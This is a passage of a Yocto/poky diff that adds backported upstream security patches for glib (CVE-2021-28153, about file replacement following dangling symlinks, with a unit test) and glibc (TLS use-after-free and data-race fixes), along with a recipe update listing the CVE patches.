@@ -0,0 +1,57 @@ +Backport of: + +From ce0eb088a68171eed3ac217cb92a72e36eb57d1b Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Wed, 10 Mar 2021 16:05:55 +0000 +Subject: [PATCH 3/5] glocalfileoutputstream: Factor out a flag check + +This clarifies the code a little. It introduces no functional changes. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-28153 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/glocalfileoutputstream.c | 7 ++++--- + 1 file changed, 4 insertions(+), 3 deletions(-) + +--- a/gio/glocalfileoutputstream.c ++++ b/gio/glocalfileoutputstream.c +@@ -847,6 +847,7 @@ handle_overwrite_open (const char *fi + int res; + int mode; + int errsv; ++ gboolean replace_destination_set = (flags & G_FILE_CREATE_REPLACE_DESTINATION); + + mode = mode_from_flags_or_info (flags, reference_info); + +@@ -954,7 +955,7 @@ handle_overwrite_open (const char *fi + * to a backup file and rewrite the contents of the file. + */ + +- if ((flags & G_FILE_CREATE_REPLACE_DESTINATION) || ++ if (replace_destination_set || + (!(original_stat.st_nlink > 1) && !is_symlink)) + { + char *dirname, *tmp_filename; +@@ -973,7 +974,7 @@ handle_overwrite_open (const char *fi + + /* try to keep permissions (unless replacing) */ + +- if ( ! (flags & G_FILE_CREATE_REPLACE_DESTINATION) && ++ if (!replace_destination_set && + ( + #ifdef HAVE_FCHOWN + fchown (tmpfd, original_stat.st_uid, original_stat.st_gid) == -1 || +@@ -1112,7 +1113,7 @@ handle_overwrite_open (const char *fi + } + } + +- if (flags & G_FILE_CREATE_REPLACE_DESTINATION) ++ if (replace_destination_set) + { + g_close (fd, NULL); + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch new file mode 100644 index 0000000000..5b106e8474 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch @@ -0,0 +1,265 @@ +Backport of: + +From 317b3b587058a05dca95d56dac26568c5b098d33 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Wed, 24 Feb 2021 17:36:07 +0000 +Subject: [PATCH 4/5] glocalfileoutputstream: Fix CREATE_REPLACE_DESTINATION + with symlinks +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The `G_FILE_CREATE_REPLACE_DESTINATION` flag is equivalent to unlinking +the destination file and re-creating it from scratch. That did +previously work, but in the process the code would call `open(O_CREAT)` +on the file. If the file was a dangling symlink, this would create the +destination file (empty). That’s not an intended side-effect, and has +security implications if the symlink is controlled by a lower-privileged +process. + +Fix that by not opening the destination file if it’s a symlink, and +adjusting the rest of the code to cope with + - the fact that `fd == -1` is not an error iff `is_symlink` is true, + - and that `original_stat` will contain the `lstat()` results for the + symlink now, rather than the `stat()` results for its target (again, + iff `is_symlink` is true). + +This means that the target of the dangling symlink is no longer created, +which was the bug. The symlink itself continues to be replaced (as +before) with the new file — this is the intended behaviour of +`g_file_replace()`. + +The behaviour for non-symlink cases, or cases where the symlink was not +dangling, should be unchanged. + +Includes a unit test. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> + +Fixes: #2325 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-28153 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/glocalfileoutputstream.c | 77 ++++++++++++++++++------- + gio/tests/file.c | 108 +++++++++++++++++++++++++++++++++++ + 2 files changed, 163 insertions(+), 22 deletions(-) + +--- a/gio/glocalfileoutputstream.c ++++ b/gio/glocalfileoutputstream.c +@@ -875,16 +875,22 @@ handle_overwrite_open (const char *fi + /* Could be a symlink, or it could be a regular ELOOP error, + * but then the next open will fail too. */ + is_symlink = TRUE; +- fd = g_open (filename, open_flags, mode); ++ if (!replace_destination_set) ++ fd = g_open (filename, open_flags, mode); + } +-#else +- fd = g_open (filename, open_flags, mode); +- errsv = errno; ++#else /* if !O_NOFOLLOW */ + /* This is racy, but we do it as soon as possible to minimize the race */ + is_symlink = g_file_test (filename, G_FILE_TEST_IS_SYMLINK); ++ ++ if (!is_symlink || !replace_destination_set) ++ { ++ fd = g_open (filename, open_flags, mode); ++ errsv = errno; ++ } + #endif + +- if (fd == -1) ++ if (fd == -1 && ++ (!is_symlink || !replace_destination_set)) + { + char *display_name = g_filename_display_name (filename); + g_set_error (error, G_IO_ERROR, +@@ -898,7 +904,14 @@ handle_overwrite_open (const char *fi + #ifdef G_OS_WIN32 + res = GLIB_PRIVATE_CALL (g_win32_fstat) (fd, &original_stat); + #else +- res = fstat (fd, &original_stat); ++ if (!is_symlink) ++ { ++ res = fstat (fd, &original_stat); ++ } ++ else ++ { ++ res = lstat (filename, &original_stat); ++ } + #endif + errsv = errno; + +@@ -917,16 +930,27 @@ handle_overwrite_open (const char *fi + if (!S_ISREG (original_stat.st_mode)) + { + if (S_ISDIR (original_stat.st_mode)) +- g_set_error_literal (error, +- G_IO_ERROR, +- G_IO_ERROR_IS_DIRECTORY, +- _("Target file is a directory")); +- else +- g_set_error_literal (error, ++ { ++ g_set_error_literal (error, ++ G_IO_ERROR, ++ G_IO_ERROR_IS_DIRECTORY, ++ _("Target file is a directory")); ++ goto err_out; ++ } ++ else if (!is_symlink || ++#ifdef S_ISLNK ++ !S_ISLNK (original_stat.st_mode) ++#else ++ FALSE ++#endif ++ ) ++ { ++ g_set_error_literal (error, + G_IO_ERROR, + G_IO_ERROR_NOT_REGULAR_FILE, + _("Target file is not a regular file")); +- goto err_out; ++ goto err_out; ++ } + } + + if (etag != NULL) +@@ -1007,7 +1031,8 @@ handle_overwrite_open (const char *fi + } + } + +- g_close (fd, NULL); ++ if (fd >= 0) ++ g_close (fd, NULL); + *temp_filename = tmp_filename; + return tmpfd; + } +--- a/gio/tests/file.c ++++ b/gio/tests/file.c +@@ -804,6 +804,113 @@ test_replace_cancel (void) + g_object_unref (tmpdir); + } + ++static void ++test_replace_symlink (void) ++{ ++#ifdef G_OS_UNIX ++ gchar *tmpdir_path = NULL; ++ GFile *tmpdir = NULL, *source_file = NULL, *target_file = NULL; ++ GFileOutputStream *stream = NULL; ++ const gchar *new_contents = "this is a test message which should be written to source and not target"; ++ gsize n_written; ++ GFileEnumerator *enumerator = NULL; ++ GFileInfo *info = NULL; ++ gchar *contents = NULL; ++ gsize length = 0; ++ GError *local_error = NULL; ++ ++ g_test_bug ("https://gitlab.gnome.org/GNOME/glib/-/issues/2325"); ++ g_test_summary ("Test that G_FILE_CREATE_REPLACE_DESTINATION doesn’t follow symlinks"); ++ ++ /* Create a fresh, empty working directory. */ ++ tmpdir_path = g_dir_make_tmp ("g_file_replace_symlink_XXXXXX", &local_error); ++ g_assert_no_error (local_error); ++ tmpdir = g_file_new_for_path (tmpdir_path); ++ ++ g_test_message ("Using temporary directory %s", tmpdir_path); ++ g_free (tmpdir_path); ++ ++ /* Create symlink `source` which points to `target`. */ ++ source_file = g_file_get_child (tmpdir, "source"); ++ target_file = g_file_get_child (tmpdir, "target"); ++ g_file_make_symbolic_link (source_file, "target", NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ /* Ensure that `target` doesn’t exist */ ++ g_assert_false (g_file_query_exists (target_file, NULL)); ++ ++ /* Replace the `source` symlink with a regular file using ++ * %G_FILE_CREATE_REPLACE_DESTINATION, which should replace it *without* ++ * following the symlink */ ++ stream = g_file_replace (source_file, NULL, FALSE /* no backup */, ++ G_FILE_CREATE_REPLACE_DESTINATION, NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ g_output_stream_write_all (G_OUTPUT_STREAM (stream), new_contents, strlen (new_contents), ++ &n_written, NULL, &local_error); ++ g_assert_no_error (local_error); ++ g_assert_cmpint (n_written, ==, strlen (new_contents)); ++ ++ g_output_stream_close (G_OUTPUT_STREAM (stream), NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ g_clear_object (&stream); ++ ++ /* At this point, there should still only be one file: `source`. It should ++ * now be a regular file. `target` should not exist. */ ++ enumerator = g_file_enumerate_children (tmpdir, ++ G_FILE_ATTRIBUTE_STANDARD_NAME "," ++ G_FILE_ATTRIBUTE_STANDARD_TYPE, ++ G_FILE_QUERY_INFO_NOFOLLOW_SYMLINKS, NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ info = g_file_enumerator_next_file (enumerator, NULL, &local_error); ++ g_assert_no_error (local_error); ++ g_assert_nonnull (info); ++ ++ g_assert_cmpstr (g_file_info_get_name (info), ==, "source"); ++ g_assert_cmpint (g_file_info_get_file_type (info), ==, G_FILE_TYPE_REGULAR); ++ ++ g_clear_object (&info); ++ ++ info = g_file_enumerator_next_file (enumerator, NULL, &local_error); ++ g_assert_no_error (local_error); ++ g_assert_null (info); ++ ++ g_file_enumerator_close (enumerator, NULL, &local_error); ++ g_assert_no_error (local_error); ++ g_clear_object (&enumerator); ++ ++ /* Double-check that `target` doesn’t exist */ ++ g_assert_false (g_file_query_exists (target_file, NULL)); ++ ++ /* Check the content of `source`. */ ++ g_file_load_contents (source_file, ++ NULL, ++ &contents, ++ &length, ++ NULL, ++ &local_error); ++ g_assert_no_error (local_error); ++ g_assert_cmpstr (contents, ==, new_contents); ++ g_assert_cmpuint (length, ==, strlen (new_contents)); ++ g_free (contents); ++ ++ /* Tidy up. */ ++ g_file_delete (source_file, NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ g_file_delete (tmpdir, NULL, &local_error); ++ g_assert_no_error (local_error); ++ ++ g_clear_object (&target_file); ++ g_clear_object (&source_file); ++ g_clear_object (&tmpdir); ++#else /* if !G_OS_UNIX */ ++ g_test_skip ("Symlink replacement tests can only be run on Unix") ++#endif ++} ++ + static void + on_file_deleted (GObject *object, + GAsyncResult *result, +@@ -1752,6 +1859,7 @@ main (int argc, char *argv[]) + g_test_add_data_func ("/file/async-create-delete/4096", GINT_TO_POINTER (4096), test_create_delete); + g_test_add_func ("/file/replace-load", test_replace_load); + g_test_add_func ("/file/replace-cancel", test_replace_cancel); ++ g_test_add_func ("/file/replace-symlink", test_replace_symlink); + g_test_add_func ("/file/async-delete", test_async_delete); + #ifdef G_OS_UNIX + g_test_add_func ("/file/copy-preserve-mode", test_copy_preserve_mode); diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch new file mode 100644 index 0000000000..2334147f7d --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch @@ -0,0 +1,55 @@ +From 6c6439261bc7a8a0627519848a7222b3e1bd4ffe Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Wed, 24 Feb 2021 17:42:24 +0000 +Subject: [PATCH 5/5] glocalfileoutputstream: Add a missing O_CLOEXEC flag to + replace() + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-28153 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/glocalfileoutputstream.c | 15 ++++++++++++--- + 1 file changed, 12 insertions(+), 3 deletions(-) + +--- a/gio/glocalfileoutputstream.c ++++ b/gio/glocalfileoutputstream.c +@@ -58,6 +58,12 @@ + #define O_BINARY 0 + #endif + ++#ifndef O_CLOEXEC ++#define O_CLOEXEC 0 ++#else ++#define HAVE_O_CLOEXEC 1 ++#endif ++ + struct _GLocalFileOutputStreamPrivate { + char *tmp_filename; + char *original_filename; +@@ -1223,7 +1229,7 @@ _g_local_file_output_stream_replace (con + sync_on_close = FALSE; + + /* If the file doesn't exist, create it */ +- open_flags = O_CREAT | O_EXCL | O_BINARY; ++ open_flags = O_CREAT | O_EXCL | O_BINARY | O_CLOEXEC; + if (readable) + open_flags |= O_RDWR; + else +@@ -1253,8 +1259,11 @@ _g_local_file_output_stream_replace (con + set_error_from_open_errno (filename, error); + return NULL; + } +- +- ++#if !defined(HAVE_O_CLOEXEC) && defined(F_SETFD) ++ else ++ fcntl (fd, F_SETFD, FD_CLOEXEC); ++#endif ++ + stream = g_object_new (G_TYPE_LOCAL_FILE_OUTPUT_STREAM, NULL); + stream->priv->fd = fd; + stream->priv->sync_on_close = sync_on_close; diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb b/poky/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb index 1a006b9f38..c2145bc6c2 100644 --- a/poky/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb @@ -18,6 +18,30 @@ SRC_URI = "${GNOME_MIRROR}/glib/${SHRT_VER}/glib-${PV}.tar.xz \ file://0001-gio-tests-resources.c-comment-out-a-build-host-only-.patch \ file://tzdata-update.patch \ file://CVE-2020-35457.patch \ + file://CVE-2021-27218.patch \ + file://CVE-2021-27219-01.patch \ + file://CVE-2021-27219-02.patch \ + file://CVE-2021-27219-03.patch \ + file://CVE-2021-27219-04.patch \ + file://CVE-2021-27219-05.patch \ + file://CVE-2021-27219-06.patch \ + file://CVE-2021-27219-07.patch \ + file://CVE-2021-27219-08.patch \ + file://CVE-2021-27219-09.patch \ + file://CVE-2021-27219-10.patch \ + file://CVE-2021-27219-11.patch \ + file://CVE-2021-27219-reg1-1.patch \ + file://CVE-2021-27219-reg1-2.patch \ + file://CVE-2021-27219-reg1-4.patch \ + file://CVE-2021-27219-reg1-5.patch \ + file://CVE-2021-27219-reg2-1.patch \ + file://CVE-2021-27219-reg2-2.patch \ + file://CVE-2021-27219-reg2-3.patch \ + file://CVE-2021-28153-1.patch \ + file://CVE-2021-28153-2.patch \ + file://CVE-2021-28153-3.patch \ + file://CVE-2021-28153-4.patch \ + file://CVE-2021-28153-5.patch \ " SRC_URI_append_class-native = " file://relocate-modules.patch" diff --git a/poky/meta/recipes-core/glibc/cross-localedef-native_2.31.bb b/poky/meta/recipes-core/glibc/cross-localedef-native_2.31.bb index 24de55d929..9aa24eccfe 100644 --- a/poky/meta/recipes-core/glibc/cross-localedef-native_2.31.bb +++ b/poky/meta/recipes-core/glibc/cross-localedef-native_2.31.bb @@ -20,7 +20,7 @@ inherit autotools FILESEXTRAPATHS =. "${FILE_DIRNAME}/${PN}:${FILE_DIRNAME}/glibc:" SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \ - git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef \ + git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef;protocol=https \ \ file://0001-localedef-Add-hardlink-resolver-to-build.patch;patchdir=localedef \ \ diff --git a/poky/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch b/poky/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch new file mode 100644 index 0000000000..dba491f4dc --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch @@ -0,0 +1,66 @@ +From c0669ae1a629e16b536bf11cdd0865e0dbcf4bee Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy <szabolcs.nagy@arm.com> +Date: Wed, 30 Dec 2020 21:52:38 +0000 +Subject: [PATCH] elf: Refactor _dl_update_slotinfo to avoid use after free + +map is not valid to access here because it can be freed by a concurrent +dlclose: during tls access (via __tls_get_addr) _dl_update_slotinfo is +called without holding dlopen locks. So don't check the modid of map. + +The map == 0 and map != 0 code paths can be shared (avoiding the dtv +resize in case of map == 0 is just an optimization: larger dtv than +necessary would be fine too). + +Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org> +--- + elf/dl-tls.c | 21 +++++---------------- + 1 file changed, 5 insertions(+), 16 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=c0669ae1a629e16b536bf11cdd0865e0dbcf4bee] +Signed-off-by: Akash Hadke <akash.hadke@kpit.com> +Signed-off-by: Akash Hadke <hadkeakash4@gmail.com> +--- +diff --git a/elf/dl-tls.c b/elf/dl-tls.c +index 24d00c14ef..f8b32b3ecb 100644 +--- a/elf/dl-tls.c ++++ b/elf/dl-tls.c +@@ -743,6 +743,8 @@ _dl_update_slotinfo (unsigned long int req_modid) + { + for (size_t cnt = total == 0 ? 1 : 0; cnt < listp->len; ++cnt) + { ++ size_t modid = total + cnt; ++ + size_t gen = listp->slotinfo[cnt].gen; + + if (gen > new_gen) +@@ -758,25 +760,12 @@ _dl_update_slotinfo (unsigned long int req_modid) + + /* If there is no map this means the entry is empty. */ + struct link_map *map = listp->slotinfo[cnt].map; +- if (map == NULL) +- { +- if (dtv[-1].counter >= total + cnt) +- { +- /* If this modid was used at some point the memory +- might still be allocated. */ +- free (dtv[total + cnt].pointer.to_free); +- dtv[total + cnt].pointer.val = TLS_DTV_UNALLOCATED; +- dtv[total + cnt].pointer.to_free = NULL; +- } +- +- continue; +- } +- + /* Check whether the current dtv array is large enough. */ +- size_t modid = map->l_tls_modid; +- assert (total + cnt == modid); + if (dtv[-1].counter < modid) + { ++ if (map == NULL) ++ continue; ++ + /* Resize the dtv. */ + dtv = _dl_resize_dtv (dtv); + +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch b/poky/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch new file mode 100644 index 0000000000..25beee1d50 --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch @@ -0,0 +1,191 @@ +From 1387ad6225c2222f027790e3f460e31aa5dd2c54 Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy <szabolcs.nagy@arm.com> +Date: Wed, 30 Dec 2020 19:19:37 +0000 +Subject: [PATCH] elf: Fix data races in pthread_create and TLS access [BZ + #19329] + +DTV setup at thread creation (_dl_allocate_tls_init) is changed +to take the dlopen lock, GL(dl_load_lock). Avoiding data races +here without locks would require design changes: the map that is +accessed for static TLS initialization here may be concurrently +freed by dlclose. That use after free may be solved by only +locking around static TLS setup or by ensuring dlclose does not +free modules with static TLS, however currently every link map +with TLS has to be accessed at least to see if it needs static +TLS. And even if that's solved, still a lot of atomics would be +needed to synchronize DTV related globals without a lock. So fix +both bug 19329 and bug 27111 with a lock that prevents DTV setup +running concurrently with dlopen or dlclose. + +_dl_update_slotinfo at TLS access still does not use any locks +so CONCURRENCY NOTES are added to explain the synchronization. +The early exit from the slotinfo walk when max_modid is reached +is not strictly necessary, but does not hurt either. + +An incorrect acquire load was removed from _dl_resize_dtv: it +did not synchronize with any release store or fence and +synchronization is now handled separately at thread creation +and TLS access time. + +There are still a number of racy read accesses to globals that +will be changed to relaxed MO atomics in a followup patch. This +should not introduce regressions compared to existing behaviour +and avoid cluttering the main part of the fix. + +Not all TLS access related data races got fixed here: there are +additional races at lazy tlsdesc relocations see bug 27137. + +Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org> +--- + elf/dl-tls.c | 63 +++++++++++++++++++++++++++++++++++++++------------- + 1 file changed, 47 insertions(+), 16 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=1387ad6225c2222f027790e3f460e31aa5dd2c54] +Signed-off-by: Akash Hadke <akash.hadke@kpit.com> +Signed-off-by: Akash Hadke <hadkeakash4@gmail.com> +--- +diff --git a/elf/dl-tls.c b/elf/dl-tls.c +index 6baff0c1ea..94f3cdbae0 100644 +--- a/elf/dl-tls.c ++++ b/elf/dl-tls.c +@@ -475,14 +475,11 @@ extern dtv_t _dl_static_dtv[]; + #endif + + static dtv_t * +-_dl_resize_dtv (dtv_t *dtv) ++_dl_resize_dtv (dtv_t *dtv, size_t max_modid) + { + /* Resize the dtv. */ + dtv_t *newp; +- /* Load GL(dl_tls_max_dtv_idx) atomically since it may be written to by +- other threads concurrently. */ +- size_t newsize +- = atomic_load_acquire (&GL(dl_tls_max_dtv_idx)) + DTV_SURPLUS; ++ size_t newsize = max_modid + DTV_SURPLUS; + size_t oldsize = dtv[-1].counter; + + if (dtv == GL(dl_initial_dtv)) +@@ -528,11 +525,14 @@ _dl_allocate_tls_init (void *result) + size_t total = 0; + size_t maxgen = 0; + ++ /* Protects global dynamic TLS related state. */ ++ __rtld_lock_lock_recursive (GL(dl_load_lock)); ++ + /* Check if the current dtv is big enough. */ + if (dtv[-1].counter < GL(dl_tls_max_dtv_idx)) + { + /* Resize the dtv. */ +- dtv = _dl_resize_dtv (dtv); ++ dtv = _dl_resize_dtv (dtv, GL(dl_tls_max_dtv_idx)); + + /* Install this new dtv in the thread data structures. */ + INSTALL_DTV (result, &dtv[-1]); +@@ -600,6 +600,7 @@ _dl_allocate_tls_init (void *result) + listp = listp->next; + assert (listp != NULL); + } ++ __rtld_lock_unlock_recursive (GL(dl_load_lock)); + + /* The DTV version is up-to-date now. */ + dtv[0].counter = maxgen; +@@ -734,12 +735,29 @@ _dl_update_slotinfo (unsigned long int req_modid) + + if (dtv[0].counter < listp->slotinfo[idx].gen) + { +- /* The generation counter for the slot is higher than what the +- current dtv implements. We have to update the whole dtv but +- only those entries with a generation counter <= the one for +- the entry we need. */ ++ /* CONCURRENCY NOTES: ++ ++ Here the dtv needs to be updated to new_gen generation count. ++ ++ This code may be called during TLS access when GL(dl_load_lock) ++ is not held. In that case the user code has to synchronize with ++ dlopen and dlclose calls of relevant modules. A module m is ++ relevant if the generation of m <= new_gen and dlclose of m is ++ synchronized: a memory access here happens after the dlopen and ++ before the dlclose of relevant modules. The dtv entries for ++ relevant modules need to be updated, other entries can be ++ arbitrary. ++ ++ This e.g. means that the first part of the slotinfo list can be ++ accessed race free, but the tail may be concurrently extended. ++ Similarly relevant slotinfo entries can be read race free, but ++ other entries are racy. However updating a non-relevant dtv ++ entry does not affect correctness. For a relevant module m, ++ max_modid >= modid of m. */ + size_t new_gen = listp->slotinfo[idx].gen; + size_t total = 0; ++ size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx)); ++ assert (max_modid >= req_modid); + + /* We have to look through the entire dtv slotinfo list. */ + listp = GL(dl_tls_dtv_slotinfo_list); +@@ -749,12 +767,14 @@ _dl_update_slotinfo (unsigned long int req_modid) + { + size_t modid = total + cnt; + ++ /* Later entries are not relevant. */ ++ if (modid > max_modid) ++ break; ++ + size_t gen = listp->slotinfo[cnt].gen; + + if (gen > new_gen) +- /* This is a slot for a generation younger than the +- one we are handling now. It might be incompletely +- set up so ignore it. */ ++ /* Not relevant. */ + continue; + + /* If the entry is older than the current dtv layout we +@@ -771,7 +791,7 @@ _dl_update_slotinfo (unsigned long int req_modid) + continue; + + /* Resize the dtv. */ +- dtv = _dl_resize_dtv (dtv); ++ dtv = _dl_resize_dtv (dtv, max_modid); + + assert (modid <= dtv[-1].counter); + +@@ -793,8 +813,17 @@ _dl_update_slotinfo (unsigned long int req_modid) + } + + total += listp->len; ++ if (total > max_modid) ++ break; ++ ++ /* Synchronize with _dl_add_to_slotinfo. Ideally this would ++ be consume MO since we only need to order the accesses to ++ the next node after the read of the address and on most ++ hardware (other than alpha) a normal load would do that ++ because of the address dependency. */ ++ listp = atomic_load_acquire (&listp->next); + } +- while ((listp = listp->next) != NULL); ++ while (listp != NULL); + + /* This will be the new maximum generation counter. */ + dtv[0].counter = new_gen; +@@ -986,7 +1015,7 @@ _dl_add_to_slotinfo (struct link_map *l, bool do_add) + the first slot. */ + assert (idx == 0); + +- listp = prevp->next = (struct dtv_slotinfo_list *) ++ listp = (struct dtv_slotinfo_list *) + malloc (sizeof (struct dtv_slotinfo_list) + + TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo)); + if (listp == NULL) +@@ -1000,6 +1029,8 @@ cannot create TLS data structures")); + listp->next = NULL; + memset (listp->slotinfo, '\0', + TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo)); ++ /* Synchronize with _dl_update_slotinfo. */ ++ atomic_store_release (&prevp->next, listp); + } + + /* Add the information into the slotinfo data structure. */ +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch b/poky/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch new file mode 100644 index 0000000000..eb8ef3161c --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch @@ -0,0 +1,206 @@ +From f4f8f4d4e0f92488431b268c8cd9555730b9afe9 Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy <szabolcs.nagy@arm.com> +Date: Wed, 30 Dec 2020 19:19:37 +0000 +Subject: [PATCH] elf: Use relaxed atomics for racy accesses [BZ #19329] + +This is a follow up patch to the fix for bug 19329. This adds relaxed +MO atomics to accesses that were previously data races but are now +race conditions, and where relaxed MO is sufficient. + +The race conditions all follow the pattern that the write is behind the +dlopen lock, but a read can happen concurrently (e.g. during tls access) +without holding the lock. For slotinfo entries the read value only +matters if it reads from a synchronized write in dlopen or dlclose, +otherwise the related dtv entry is not valid to access so it is fine +to leave it in an inconsistent state. The same applies for +GL(dl_tls_max_dtv_idx) and GL(dl_tls_generation), but there the +algorithm relies on the fact that the read of the last synchronized +write is an increasing value. + +Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org> +--- + elf/dl-close.c | 20 +++++++++++++------- + elf/dl-open.c | 5 ++++- + elf/dl-tls.c | 31 +++++++++++++++++++++++-------- + sysdeps/x86_64/dl-tls.c | 3 ++- + 4 files changed, 42 insertions(+), 17 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=f4f8f4d4e0f92488431b268c8cd9555730b9afe9] +Comment: Hunks from elf/dl-open.c and elf/dl-tls.c are refreshed due to offset change. +Signed-off-by: Akash Hadke <akash.hadke@kpit.com> +Signed-off-by: Akash Hadke <hadkeakash4@gmail.com> +--- +diff --git a/elf/dl-close.c b/elf/dl-close.c +index c51becd06b..3720e47dd1 100644 +--- a/elf/dl-close.c ++++ b/elf/dl-close.c +@@ -79,9 +79,10 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp, + { + assert (old_map->l_tls_modid == idx); + +- /* Mark the entry as unused. */ +- listp->slotinfo[idx - disp].gen = GL(dl_tls_generation) + 1; +- listp->slotinfo[idx - disp].map = NULL; ++ /* Mark the entry as unused. These can be read concurrently. */ ++ atomic_store_relaxed (&listp->slotinfo[idx - disp].gen, ++ GL(dl_tls_generation) + 1); ++ atomic_store_relaxed (&listp->slotinfo[idx - disp].map, NULL); + } + + /* If this is not the last currently used entry no need to look +@@ -96,8 +97,8 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp, + + if (listp->slotinfo[idx - disp].map != NULL) + { +- /* Found a new last used index. */ +- GL(dl_tls_max_dtv_idx) = idx; ++ /* Found a new last used index. This can be read concurrently. */ ++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), idx); + return true; + } + } +@@ -571,7 +572,9 @@ _dl_close_worker (struct link_map *map, bool force) + GL(dl_tls_dtv_slotinfo_list), 0, + imap->l_init_called)) + /* All dynamically loaded modules with TLS are unloaded. */ +- GL(dl_tls_max_dtv_idx) = GL(dl_tls_static_nelem); ++ /* Can be read concurrently. */ ++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), ++ GL(dl_tls_static_nelem)); + + if (imap->l_tls_offset != NO_TLS_OFFSET + && imap->l_tls_offset != FORCED_DYNAMIC_TLS_OFFSET) +@@ -769,8 +772,11 @@ _dl_close_worker (struct link_map *map, bool force) + /* If we removed any object which uses TLS bump the generation counter. */ + if (any_tls) + { +- if (__glibc_unlikely (++GL(dl_tls_generation) == 0)) ++ size_t newgen = GL(dl_tls_generation) + 1; ++ if (__glibc_unlikely (newgen == 0)) + _dl_fatal_printf ("TLS generation counter wrapped! Please report as described in "REPORT_BUGS_TO".\n"); ++ /* Can be read concurrently. */ ++ atomic_store_relaxed (&GL(dl_tls_generation), newgen); + + if (tls_free_end == GL(dl_tls_static_used)) + GL(dl_tls_static_used) = tls_free_start; +diff --git a/elf/dl-open.c b/elf/dl-open.c +index 09f0df7d38..bb79ef00f1 100644 +--- a/elf/dl-open.c ++++ b/elf/dl-open.c +@@ -387,9 +387,12 @@ + } + } + +- if (__builtin_expect (++GL(dl_tls_generation) == 0, 0)) ++ size_t newgen = GL(dl_tls_generation) + 1; ++ if (__glibc_unlikely (newgen == 0)) + _dl_fatal_printf (N_("\ + TLS generation counter wrapped! Please report this.")); ++ /* Can be read concurrently. */ ++ 